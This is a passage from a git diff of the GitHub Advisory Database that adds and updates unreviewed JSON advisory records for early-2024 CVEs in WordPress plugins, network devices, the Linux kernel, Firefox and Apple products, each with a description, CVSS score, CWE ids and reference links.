+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1026"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252293"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252293"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-30T01:15:59Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-g78p-m98v-8prx/GHSA-g78p-m98v-8prx.json b/advisories/unreviewed/2024/01/GHSA-g78p-m98v-8prx/GHSA-g78p-m98v-8prx.json
new file mode 100644
index 0000000000000..b474ca58a87ad
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-g78p-m98v-8prx/GHSA-g78p-m98v-8prx.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-g78p-m98v-8prx",
+ "modified": "2024-01-30T18:30:20Z",
+ "published": "2024-01-30T18:30:20Z",
+ "aliases": [
+ "CVE-2023-46231"
+ ],
+ "details": "In Splunk Add-on Builder versions below 4.1.4, the application writes user session tokens to its internal log files when you visit the Splunk Add-on Builder or when you build or edit a custom app or add-on.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46231"
+ },
+ {
+ "type": "WEB",
+ "url": "https://advisory.splunk.com/advisories/SVD-2024-0110"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-532"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-30T17:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-g89w-hcgw-6g9p/GHSA-g89w-hcgw-6g9p.json b/advisories/unreviewed/2024/01/GHSA-g89w-hcgw-6g9p/GHSA-g89w-hcgw-6g9p.json
index b1e5cd25f8fa4..0c60334b1d68e 100644
--- a/advisories/unreviewed/2024/01/GHSA-g89w-hcgw-6g9p/GHSA-g89w-hcgw-6g9p.json
+++ b/advisories/unreviewed/2024/01/GHSA-g89w-hcgw-6g9p/GHSA-g89w-hcgw-6g9p.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-g89w-hcgw-6g9p",
- "modified": "2024-01-23T15:30:58Z",
+ "modified": "2024-01-30T00:30:29Z",
 "published": "2024-01-23T15:30:58Z",
 "aliases": [
 "CVE-2024-0755"
 ],
 "details": "Memory safety bugs present in Firefox 121, Firefox ESR 115.6, and Thunderbird 115.6. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
 
@@ -26,6 +29,10 @@
 "type": "WEB",
 "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html"
 },
+ {
+ "type": "WEB",
+ "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html"
+ },
 {
 "type": "WEB",
 "url": "https://www.mozilla.org/security/advisories/mfsa2024-01/"
@@ -43,7 +50,7 @@
 "cwe_ids": [
 
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-23T14:15:38Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-gccg-f527-63v3/GHSA-gccg-f527-63v3.json b/advisories/unreviewed/2024/01/GHSA-gccg-f527-63v3/GHSA-gccg-f527-63v3.json
new file mode 100644
index 0000000000000..7d73e6e263259
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-gccg-f527-63v3/GHSA-gccg-f527-63v3.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-gccg-f527-63v3",
+ "modified": "2024-02-06T18:30:19Z",
+ "published": "2024-01-29T21:30:27Z",
+ "aliases": [
+ "CVE-2023-49038"
+ ],
+ "details": "Command injection in the ping utility on Buffalo LS210D 1.78-0.03 allows a remote authenticated attacker to inject arbitrary commands onto the NAS as root.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49038"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/christopher-pace/CVE-2023-49038"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-78"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-29T21:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-gf6c-58rg-8pjj/GHSA-gf6c-58rg-8pjj.json b/advisories/unreviewed/2024/01/GHSA-gf6c-58rg-8pjj/GHSA-gf6c-58rg-8pjj.json
new file mode 100644
index 0000000000000..3c2e911af1096
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-gf6c-58rg-8pjj/GHSA-gf6c-58rg-8pjj.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-gf6c-58rg-8pjj",
+ "modified": "2024-01-31T18:31:25Z",
+ "published": "2024-01-31T18:31:25Z",
+ "aliases": [
+ "CVE-2024-23502"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in InfornWeb Posts List Designer by Category – List Category Posts Or Recent Posts allows Stored XSS.This issue affects Posts List Designer by Category – List Category Posts Or Recent Posts: from n/a through 3.3.2.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23502"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/post-list-designer/wordpress-posts-list-designer-by-category-plugin-3-3-2-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-31T16:15:46Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-gf9w-j28x-vmch/GHSA-gf9w-j28x-vmch.json b/advisories/unreviewed/2024/01/GHSA-gf9w-j28x-vmch/GHSA-gf9w-j28x-vmch.json
new file mode 100644
index 0000000000000..2d0967d76df49
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-gf9w-j28x-vmch/GHSA-gf9w-j28x-vmch.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-gf9w-j28x-vmch",
+ "modified": "2024-02-03T00:31:32Z",
+ "published": "2024-01-29T15:30:29Z",
+ "aliases": [
+ "CVE-2023-6503"
+ ],
+ "details": "The WP Plugin Lister WordPress plugin through 2.1.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6503"
+ },
+ {
+ "type": "WEB",
+ "url": "https://magos-securitas.com/txt/CVE-2023-6503.txt"
+ },
+ {
+ "type": "WEB",
+ "url": "https://wpscan.com/vulnerability/0d95de23-e8f6-4342-b19c-57cd22b2fee2/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-352"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-29T15:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-gfh2-2mj9-m2cx/GHSA-gfh2-2mj9-m2cx.json b/advisories/unreviewed/2024/01/GHSA-gfh2-2mj9-m2cx/GHSA-gfh2-2mj9-m2cx.json
new file mode 100644
index 0000000000000..8c40d7d9d1c23
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-gfh2-2mj9-m2cx/GHSA-gfh2-2mj9-m2cx.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-gfh2-2mj9-m2cx",
+ "modified": "2024-01-31T15:30:20Z",
+ "published": "2024-01-31T15:30:20Z",
+ "aliases": [
+ "CVE-2024-1086"
+ ],
+ "details": "A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation.\n\nThe nft_verdict_init() function allows positive values as drop error within the hook verdict, and hence the nf_hook_slow() function can cause a double free vulnerability when NF_DROP is issued with a drop error which resembles NF_ACCEPT.\n\nWe recommend upgrading past commit f342de4e2f33e0e39165d8639387aa6c19dff660.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1086"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f342de4e2f33e0e39165d8639387aa6c19dff660"
+ },
+ {
+ "type": "WEB",
+ "url": "https://kernel.dance/f342de4e2f33e0e39165d8639387aa6c19dff660"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LSPIOMIJYTLZB6QKPQVVAYSUETUWKPF/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-416"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-31T13:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-gh6x-qpj6-x25r/GHSA-gh6x-qpj6-x25r.json b/advisories/unreviewed/2024/01/GHSA-gh6x-qpj6-x25r/GHSA-gh6x-qpj6-x25r.json
index 039d895223083..11d6b27046063 100644
--- a/advisories/unreviewed/2024/01/GHSA-gh6x-qpj6-x25r/GHSA-gh6x-qpj6-x25r.json
+++ b/advisories/unreviewed/2024/01/GHSA-gh6x-qpj6-x25r/GHSA-gh6x-qpj6-x25r.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-gh6x-qpj6-x25r",
- "modified": "2024-01-12T18:30:20Z",
+ "modified": "2024-02-06T12:30:30Z",
 "published": "2024-01-08T21:30:34Z",
 "aliases": [
 "CVE-2023-51490"
diff --git a/advisories/unreviewed/2024/01/GHSA-ghrw-6hf4-xx3c/GHSA-ghrw-6hf4-xx3c.json b/advisories/unreviewed/2024/01/GHSA-ghrw-6hf4-xx3c/GHSA-ghrw-6hf4-xx3c.json
index ca4a057dbf78d..b9c61df99b46f 100644
--- a/advisories/unreviewed/2024/01/GHSA-ghrw-6hf4-xx3c/GHSA-ghrw-6hf4-xx3c.json
+++ b/advisories/unreviewed/2024/01/GHSA-ghrw-6hf4-xx3c/GHSA-ghrw-6hf4-xx3c.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-ghrw-6hf4-xx3c",
- "modified": "2024-01-24T06:30:18Z",
+ "modified": "2024-01-31T00:30:17Z",
 "published": "2024-01-24T06:30:18Z",
 "aliases": [
 "CVE-2024-22366"
 ],
 "details": "Active debug code exists in Yamaha wireless LAN access point devices. If a logged-in user who knows how to use the debug function accesses the device's management page, this function can be enabled by performing specific operations. As a result, an arbitrary OS command may be executed and/or configuration settings of the device may be altered. Affected products and versions are as follows: WLX222 firmware Rev.24.00.03 and earlier, WLX413 firmware Rev.22.00.05 and earlier, WLX212 firmware Rev.21.00.12 and earlier, WLX313 firmware Rev.18.00.12 and earlier, and WLX202 firmware Rev.16.00.18 and earlier.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
 
@@ -29,9 +32,9 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-78"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-24T05:15:13Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-gpvq-2fxv-3pgq/GHSA-gpvq-2fxv-3pgq.json b/advisories/unreviewed/2024/01/GHSA-gpvq-2fxv-3pgq/GHSA-gpvq-2fxv-3pgq.json
index 20406559f3bfb..c824cd857b3a8 100644
--- a/advisories/unreviewed/2024/01/GHSA-gpvq-2fxv-3pgq/GHSA-gpvq-2fxv-3pgq.json
+++ b/advisories/unreviewed/2024/01/GHSA-gpvq-2fxv-3pgq/GHSA-gpvq-2fxv-3pgq.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-gpvq-2fxv-3pgq",
- "modified": "2024-01-23T15:30:57Z",
+ "modified": "2024-01-29T18:31:47Z",
 "published": "2024-01-23T15:30:57Z",
 "aliases": [
 "CVE-2024-0742"
 ],
 "details": "It was possible for certain browser prompts and dialogs to be activated or dismissed unintentionally by the user due to an incorrect timestamp used to prevent input after page load. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"
+ }
 ],
 "affected": [
 
@@ -26,6 +29,10 @@
 "type": "WEB",
 "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html"
 },
+ {
+ "type": "WEB",
+ "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html"
+ },
 {
 "type": "WEB",
 "url": "https://www.mozilla.org/security/advisories/mfsa2024-01/"
@@ -43,7 +50,7 @@
 "cwe_ids": [
 
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-23T14:15:38Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-gqqw-gq22-ww82/GHSA-gqqw-gq22-ww82.json b/advisories/unreviewed/2024/01/GHSA-gqqw-gq22-ww82/GHSA-gqqw-gq22-ww82.json
index a1ea006f76035..e6c6629f6421e 100644
--- a/advisories/unreviewed/2024/01/GHSA-gqqw-gq22-ww82/GHSA-gqqw-gq22-ww82.json
+++ b/advisories/unreviewed/2024/01/GHSA-gqqw-gq22-ww82/GHSA-gqqw-gq22-ww82.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-gqqw-gq22-ww82",
- "modified": "2024-01-23T03:31:08Z",
+ "modified": "2024-01-29T21:30:27Z",
 "published": "2024-01-23T03:31:08Z",
 "aliases": [
 "CVE-2023-42937"
 ],
 "details": "A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in iOS 16.7.5 and iPadOS 16.7.5, watchOS 10.2, macOS Ventura 13.6.4, macOS Sonoma 14.2, macOS Monterey 12.7.3, iOS 17.2 and iPadOS 17.2. An app may be able to access sensitive user data.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
+ }
 ],
 "affected": [
 
@@ -71,7 +74,7 @@
 "cwe_ids": [
 
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-23T01:15:10Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-gqr9-4fcc-c9jq/GHSA-gqr9-4fcc-c9jq.json b/advisories/unreviewed/2024/01/GHSA-gqr9-4fcc-c9jq/GHSA-gqr9-4fcc-c9jq.json
index 900e7f576d42b..c591b9114c916 100644
--- a/advisories/unreviewed/2024/01/GHSA-gqr9-4fcc-c9jq/GHSA-gqr9-4fcc-c9jq.json
+++ b/advisories/unreviewed/2024/01/GHSA-gqr9-4fcc-c9jq/GHSA-gqr9-4fcc-c9jq.json
@@ -36,6 +36,10 @@
 {
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D6C2HN4T2S6GYNTAUXLH45LQZHK7QPHP/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
 }
 ],
 "database_specific": {
diff --git a/advisories/unreviewed/2024/01/GHSA-grx2-83w4-8647/GHSA-grx2-83w4-8647.json b/advisories/unreviewed/2024/01/GHSA-grx2-83w4-8647/GHSA-grx2-83w4-8647.json
new file mode 100644
index 0000000000000..e8c3621d5dbfe
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-grx2-83w4-8647/GHSA-grx2-83w4-8647.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-grx2-83w4-8647",
+ "modified": "2024-01-29T18:31:53Z",
+ "published": "2024-01-29T18:31:53Z",
+ "aliases": [
+ "CVE-2023-40550"
+ ],
+ "details": "An out-of-bounds read flaw was found in Shim when it tried to validate the SBAT information. This issue may expose sensitive data during the system's boot phase.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-40550"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/security/cve/CVE-2023-40550"
+ },
+ {
+ "type": "WEB",
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2259915"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-125"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-29T17:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-gvjg-pwqj-xrpj/GHSA-gvjg-pwqj-xrpj.json b/advisories/unreviewed/2024/01/GHSA-gvjg-pwqj-xrpj/GHSA-gvjg-pwqj-xrpj.json
index a2c53ef189b7c..d3a1a406c013e 100644
--- a/advisories/unreviewed/2024/01/GHSA-gvjg-pwqj-xrpj/GHSA-gvjg-pwqj-xrpj.json
+++ b/advisories/unreviewed/2024/01/GHSA-gvjg-pwqj-xrpj/GHSA-gvjg-pwqj-xrpj.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-gvjg-p
wqj-xrpj",
- "modified": "2024-01-23T21:30:21Z",
+ "modified": "2024-01-30T00:30:29Z",
 "published": "2024-01-23T21:30:21Z",
 "aliases": [
 "CVE-2023-52330"
 ],
 "details": "A cross-site scripting vulnerability in Trend Micro Apex Central could allow a remote attacker to execute arbitrary code on affected installations of Trend Micro Apex Central.\n\nPlease note: user interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ }
 ],
 "affected": [
 
@@ -29,9 +32,9 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-79"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-23T21:15:09Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-gvqj-cjp6-grrv/GHSA-gvqj-cjp6-grrv.json b/advisories/unreviewed/2024/01/GHSA-gvqj-cjp6-grrv/GHSA-gvqj-cjp6-grrv.json
index 183592c0e0ea3..b76f8b93403d7 100644
--- a/advisories/unreviewed/2024/01/GHSA-gvqj-cjp6-grrv/GHSA-gvqj-cjp6-grrv.json
+++ b/advisories/unreviewed/2024/01/GHSA-gvqj-cjp6-grrv/GHSA-gvqj-cjp6-grrv.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-gvqj-cjp6-grrv",
- "modified": "2024-01-23T21:30:21Z",
+ "modified": "2024-01-31T15:30:19Z",
 "published": "2024-01-23T21:30:21Z",
 "aliases": [
 "CVE-2023-52338"
 ],
 "details": "A link following vulnerability in the Trend Micro Deep Security 20.0 and Trend Micro Cloud One - Endpoint and Workload Security Agent could allow a local attacker to escalate privileges on affected installations.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
 
@@ -29,9 +32,9 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-59"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-23T21:15:09Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-gxh9-cf3g-3v7f/GHSA-gxh9-cf3g-3v7f.json b/advisories/unreviewed/2024/01/GHSA-gxh9-cf3g-3v7f/GHSA-gxh9-cf3g-3v7f.json
index beee5394642ff..358933e9142f2 100644
--- a/advisories/unreviewed/2024/01/GHSA-gxh9-cf3g-3v7f/GHSA-gxh9-cf3g-3v7f.json
+++ b/advisories/unreviewed/2024/01/GHSA-gxh9-cf3g-3v7f/GHSA-gxh9-cf3g-3v7f.json
@@ -28,7 +28,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-502"
 ],
 "severity": "CRITICAL",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2024/01/GHSA-h3vc-4gq7-6h97/GHSA-h3vc-4gq7-6h97.json b/advisories/unreviewed/2024/01/GHSA-h3vc-4gq7-6h97/GHSA-h3vc-4gq7-6h97.json
new file mode 100644
index 0000000000000..46cea6ad48a3c
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-h3vc-4gq7-6h97/GHSA-h3vc-4gq7-6h97.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-h3vc-4gq7-6h97",
+ "modified": "2024-01-29T15:30:27Z",
+ "published": "2024-01-29T15:30:27Z",
+ "aliases": [
+ "CVE-2024-0998"
+ ],
+ "details": "A vulnerability was found in Totolink N200RE 9.3.5u.6139_B20201216. It has been classified as critical. This affects the function setDiagnosisCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument ip leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252267. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0998"
+ },
+ {
+ "type": "WEB",
+ "url": "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setDiagnosisCfg-b2d36451543e4c6da063646721a24604?pvs=4"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252267"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252267"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-121"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-29T13:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-h3x8-jx27-7vw4/GHSA-h3x8-jx27-7vw4.json b/advisories/unreviewed/2024/01/GHSA-h3x8-jx27-7vw4/GHSA-h3x8-jx27-7vw4.json
index 2d29bb2a72de7..c92daa69b4d7d 100644
--- a/advisories/unreviewed/2024/01/GHSA-h3x8-jx27-7vw4/GHSA-h3x8-jx27-7vw4.json
+++ b/advisories/unreviewed/2024/01/GHSA-h3x8-jx27-7vw4/GHSA-h3x8-jx27-7vw4.json
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-h3x8-jx27-7vw4", - "modified": "2024-01-23T03:31:08Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T03:31:08Z", "aliases": [ "CVE-2024-23210" ], "details": "This issue was addressed with improved redaction of sensitive information. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An app may be able to view a user's phone number in system logs.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N" + } ], "affected": [ @@ -55,7 +58,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T01:15:11Z" diff --git a/advisories/unreviewed/2024/01/GHSA-h49c-jgw7-9grp/GHSA-h49c-jgw7-9grp.json b/advisories/unreviewed/2024/01/GHSA-h49c-jgw7-9grp/GHSA-h49c-jgw7-9grp.json index 35680151662e6..f2a2fbbdf5adc 100644 --- a/advisories/unreviewed/2024/01/GHSA-h49c-jgw7-9grp/GHSA-h49c-jgw7-9grp.json +++ b/advisories/unreviewed/2024/01/GHSA-h49c-jgw7-9grp/GHSA-h49c-jgw7-9grp.json @@ -28,7 +28,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-284" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-h4gx-v8fr-h545/GHSA-h4gx-v8fr-h545.json b/advisories/unreviewed/2024/01/GHSA-h4gx-v8fr-h545/GHSA-h4gx-v8fr-h545.json new file mode 100644 index 0000000000000..078cec58bef75 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-h4gx-v8fr-h545/GHSA-h4gx-v8fr-h545.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h4gx-v8fr-h545", + "modified": "2024-01-31T18:31:26Z", + "published": "2024-01-31T18:31:26Z", + "aliases": [ + "CVE-2024-22161" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Harmonic Design HD Quiz allows Stored XSS.This issue affects HD Quiz: from n/a through 1.8.11.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22161" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/hd-quiz/wordpress-hd-quiz-plugin-1-8-11-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T18:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-h53r-v36g-3338/GHSA-h53r-v36g-3338.json b/advisories/unreviewed/2024/01/GHSA-h53r-v36g-3338/GHSA-h53r-v36g-3338.json new file mode 100644 index 0000000000000..b9a06202c2813 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-h53r-v36g-3338/GHSA-h53r-v36g-3338.json 
